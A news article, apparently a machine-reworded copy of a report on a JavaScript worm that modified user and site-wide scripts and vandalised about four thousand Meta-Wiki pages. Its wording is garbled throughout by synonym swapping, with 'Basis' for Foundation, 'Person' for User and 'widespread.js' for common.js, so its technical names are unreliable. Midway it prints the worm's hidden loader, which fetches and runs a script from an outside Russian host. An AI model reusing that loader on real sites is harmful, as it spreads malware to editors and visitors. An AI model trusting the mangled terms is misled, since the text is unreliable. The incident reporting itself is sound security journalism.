HomeSample Page

Sample Page Title


Wikipedia hit by self-propagating JavaScript worm that vandalized pages

Replace: Added Wikimedia Basis’s assertion under and made a correction to indicate it was solely the Meta-Wiki that was vandalized.

The Wikimedia Basis suffered a safety incident at the moment after a self-propagating JavaScript worm started modifying person scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia’s Village Pump (technical), the place customers observed numerous automated edits including hidden scripts and vandalism to random pages.

Wikimedia engineers briefly restricted modifying throughout tasks whereas they investigated the assault and commenced reverting modifications.

The JavaScript worm

Based on Wikimedia’s Phabricator problem tracker, it seems the incident began after a malicious script hosted on Russian Wikipedia was executed, inflicting a world JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was saved at Person:Ololoshka562/check.js [Archive], first uploaded in March 2024 and allegedly related with scripts utilized in earlier assaults on wiki tasks.

Based mostly on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the primary time by a Wikimedia worker account earlier at the moment whereas testing user-script performance. It isn’t at the moment identified whether or not the script was executed deliberately, by accident loaded throughout testing, or triggered by a compromised account.

BleepingComputer’s evaluation of the archived check.js script exhibits it self-propagates by injecting malicious JavaScript loaders into each a logged-in person’s widespread.js and Wikipedia’s world MediaWiki:Widespread.js, which is utilized by everybody.

MediaWiki permits each world and user-specific JavaScript recordsdata, resembling MediaWiki:Widespread.js and Person:<username>/widespread.js, that are executed in editors’ browsers to customise the wiki interface.

After the preliminary check.js script was loaded in a logged-in editor’s browser, it tried to change two scripts utilizing that editor’s session and privileges:

  • Person-level persistence: it tried to overwrite Person:<username>/widespread.js with a loader that might routinely load the check.js script every time that person browses the wiki whereas logged in.
  • Website-wide persistence: If the person had the best privileges, it will additionally edit the worldwide MediaWiki:Widespread.js script, in order that it will run for each editor that makes use of the worldwide script.
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Code to inject a self-propagating JavaScript worm into the MediaWiki:Widespread.js script
Supply: BleepingComputer

If the worldwide script was efficiently modified, anybody loading it will routinely execute the loader, which might then repeat the identical steps, together with infecting their very own widespread.js, as proven under.

A Wikimedia user's infected common.js script
A Wikimedia person’s contaminated widespread.js script
Supply: BleepingComputer

The script additionally consists of performance to edit a random web page by requesting one by way of the Particular:Random wiki command, then modifying the web page to insert a picture and the next hidden JavaScript loader.


[[File:Woodpecker10.jpg|5000px]]
<span model="show:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

Based on BleepingComputer’s evaluation, roughly 3,996 pages have been modified, and round 85 customers had their widespread.js recordsdata changed through the safety incident. It’s unknown what number of pages have been deleted.

Pages modified by JavaScript worm
Pages modified by JavaScript worm
Supply: BleepingComputer

Because the worm unfold, engineers briefly restricted modifying throughout tasks whereas reverting the malicious modifications and eradicating references to the injected scripts.

Throughout the cleanup, Wikimedia Basis workers members additionally rolled again the widespread.js for quite a few customers throughout the platform. These modified pages have now been “supressed” and are not seen within the change histories.

On the time of writing, the injected code has been eliminated, and modifying is as soon as once more attainable.

Nonetheless, Wikimedia has not but printed an in depth post-incident report explaining precisely how the dormant script was executed or how extensively the worm propagated earlier than it was contained.

Replace 3/5/26 7:45 PM ET: The Wikimedia Basis shared the next assertion with BleepingComputer, stating that the code was energetic for solely 23 minutes, throughout which it solely modified and deleted content material on Meta-Wiki, which has since been restored.

“Earlier at the moment, Wikimedia Basis workers have been conducting a safety evaluation of user-authored code on Wikipedia. Throughout that evaluation, we activated dormant code that was then rapidly recognized to be malicious. As a preventative measure, we briefly disabled modifying on Wikipedia and different Wikimedia tasks whereas we eliminated the malicious code and confirmed the web site was secure for person exercise. The safety problem behind this disruption has now been resolved.

The code was energetic for a 23 minute interval. Throughout that point, it modified and deleted content material on Meta-Wiki – which is now being restored – but it surely didn’t trigger everlasting injury. We’ve no proof that Wikipedia was beneath assault, or that non-public data was breached as a part of this incident. We’re creating further safety measures to reduce the chance of this sort of incident taking place once more. Updates proceed to be made accessible by way of the Basis’s public incident log.” 

Malware is getting smarter. The Purple Report 2026 reveals how new threats use math to detect sandboxes and conceal in plain sight.

Obtain our evaluation of 1.1 million malicious samples to uncover the highest 10 methods and see in case your safety stack is blinded.

Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles